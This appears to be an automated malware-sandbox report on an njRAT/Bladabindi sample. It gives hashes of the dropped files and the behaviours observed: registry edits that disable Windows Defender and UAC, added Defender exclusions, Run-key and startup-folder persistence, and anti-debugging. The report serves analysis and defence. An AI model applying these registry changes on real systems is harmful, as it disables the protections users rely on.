SHA512 48b6b28d4aa7004e047e62d2a37c5ec0f73f8e6546e21913b7627d4daf15e6556730216bee63a8974afa2666494f7d235ef8b9be64dce7aeee6e444757acb46f

C:\Windows\EdgeBrowser.exe

MD5 81bda5dffbd964c6199ff8f9fb62c386
SHA1 ea645805a8e9872304e402832b6fbfc96bdb660a
SHA256 89c860c035a86b1e1c1af540eaaabb15db50a15c70086b2d986a159c32d1e918
SHA512 bb9baaac4c57a703bc0f3e7307ed4596a6d10ea90a5f6fd48e06d3a015447aa644b9f8ab5e0496a3cb8a738fd6bc72c3158c4203530a4342b555473197bc71f1

C:\Windows\EdgeBrowser.exe

MD5 796ed4b0db9b3d50149b39c35c97fb22
SHA1 154fde51c43d3a8b8f1b96df04f3e97fe4c922a6
SHA256 37db478cd1a50883e179c601987b3a5171823aaa9d04063817fa7af57723ffb7
SHA512 762989d2993cc2431b50ae9a2847cc3b16bce41c15da9a974dd90c66884ac28b32698edbf9d13b948d7b1f22919278b43e4448710dda2b2489b509bd6ecf00c7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6a93937d54e9fd95fb056f6d64d075ed
SHA1 8502f83f952b07a1fdf0e6d70fb9808ebb14195d
SHA256 0833790b15fb1c86c4263ea85368896b71d58ad6f6497cc6ac97b52b20114c10
SHA512 85e0171b694c18e8bd44c77fdb441f34f3c535fff5c0ca1925660957188369c8b88c6740c2e5b785cd39d990f5f8e42102736dae03acf158f4657ff52f519beb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3066c5fda9cb7ef23c35380b45f3a583
SHA1 ffc39b2adad1b8456d4fc3f0562aa4fd359bb7e0
SHA256 ed1fb092e9ad637e4a9bbb4ffb0ef9d9f420752ef2d0593bd3eb2ef4bc731720
SHA512 c726decb49b1fb0d55909f4b1d395da8a1a7a1982a044bcbedb21521247e33ef55632527b8585dd210fb0bd2198dd5c37c63f579d0ba8153b9a9b750d3ca6dc0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3b763c0f171168322352b7c2d44f0363
SHA1 a462f3abb60f9d9183261a7a8b561841fa0d5acc
SHA256 50f12d1c7f69b71bac2d15bc83e87f94e1d2f8539df2aad2b45c84ef4d1c0693
SHA512 a8ed2a2419d723ac97fc442351e8cfde2f528f9f80273fe29d21c21c166d31fb083d7da60c93dbf804ae23ee57e50c13bd78e7056250506fa4adaf28c7ba6342

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ef0ff7fab3698e36f71ff2e5104a0cbb
SHA1 b5f931fe2ab8c7f52cdc72c94dd2bfceab266845
SHA256 4ac50ebcf55d17aba4e6e8a2ef02a518b65400940fcf472d8f9ff7c83cde42c3
SHA512 a4fbb43a7fc248ea358d8b0b93dc84629ec0716549da8e91e109e17fd4a2800be9f7f14f83c052dbaf8f881f76f83dc9737f8e6116845fb656c37b659dd6ef59

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5cc6f319006e65e83cf5a83452ef1462
SHA1 deab3bf72efa0c849b5dfd2b384e3889001d0178
SHA256 73669629d189346d53326de4715f65fdcd571bfb3681f97c78f195c2869b782e
SHA512 5042589a9d5d8b7b9fc8319bc989d0b0353b54877361e663d5301cca69f5d5683db7f90ec7218a51de35f4f61d4cf283feef634a8e296b9a93c8cd5c51650129

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1a3c8348583151adec3f6b7c3669c886
SHA1 9d9ace9ebb4fe417bbc72f5e5a6c4441d8746c60
SHA256 56bbea00d94ce1668accae9d334c775b324d6349cebde9439c4d03632bae825e
SHA512 9ed0f7a06acbdff7ef7dceb0f4debb7bd5237107901fff074e3a77cb417ba89a3d0e8dfaa2ad86bc5e38f2b587f043872bfcdfc123c938c6bcb6ef5e65ea8eb6

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EdgeBrowser.exe.log

MD5 7119a280abc0c4b5f21a0932887a54ac
SHA1 aa369248ea6d293fe56a5ed669e29cd897911f84
SHA256 418398bab7542ba692fe00d88d6de06c65f73b9376567c5190a007f7a211c91f
SHA512 b11111d017e86445be9c41d2ca4a6e147cf2d8ae31663bb0772e2eaaf3a7a906285ab78a708d9122a29f8aa2519e80b12e050ad4538867e2b5d3edb0fe21039f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bd76416a086fedc4c0e2abaaf74525fb
SHA1 27992c39e25de4d7d49a4762a25ced1160bcd521
SHA256 bc8bcf7709b2b5c4a0b32047c2e1be3f7b2492ac892ea75745c84cf999ffb8c6
SHA512 2fe2afdace104e4328b479909459dc248484537c8af59b57201986562f353c99a7dac0e4e68bdccc85fd0e26c547f49e30a8b40ea7e970fd88077c20f48716a1

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 74d7095da2833bb0dff8c00536ca95c1
SHA1 8ba1052306aa360adcaee670666e2c42044b0018
SHA256 9f088611b35f28d77a330c0aa545269a25eecc9411566cd33fa2f7d72a671244
SHA512 b82a5b5fdd7703740305514f09adbdb22caab6d0b36e49867fa470932f0ef11ad78c4defdcb0342642202ec432ec281864dd3096e82ddf84a8db8895620e751b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8c4217af9f07bded779a75b814d05119
SHA1 fa8c23e1a873815a740c31487b058fac7efdddc8
SHA256 5c3c39026f031c34978cf4ca3a32b568b54f8103ceda5580969537b196d21671
SHA512 ca8cd0eea48f541160943cb0379c3c71de9b9425769299ad0c17daa101b24882b05d472ab93d9e025968ab91ea038561223ecc506dd53a42bdf60a185c38b786

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2002a1cb17c93d10191f253e2f29b73b
SHA1 3befbcd3100b5c64e5171e6837389c24dc8ed8f0
SHA256 719bf57a58c0ce85fdfce8f61ea17c234f4765792b37d070d3bbb56604c75866
SHA512 04faf60afc929a0c0ab86c2bc08a9f3365b7706b615b3136d9abf7be04f18477a5d82d34cfd0622cc9dfe42773ba57a02a964eb65aa962b515e5a68f46605018

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-27 05:47

Reported

2024-01-27 05:50

Platform

win7-20231215-en

Max time kernel

150s

Max time network

139s

Command Line

"C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\EdgeBrowser.exe = "0" N/A N/A

njRAT/Bladabindi

trojan njrat

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\EdgeBrowser.exe = "0" N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1268429524-3929314613-1992311491-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1268429524-3929314613-1992311491-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1268429524-3929314613-1992311491-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA N/A N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\EdgeBrowser.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\06171b0f-90a3-4bce-b0cc-e7f8bfe631c0\AdvancedRun.exe N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeImpersonatePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeImpersonatePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A N/A N/A
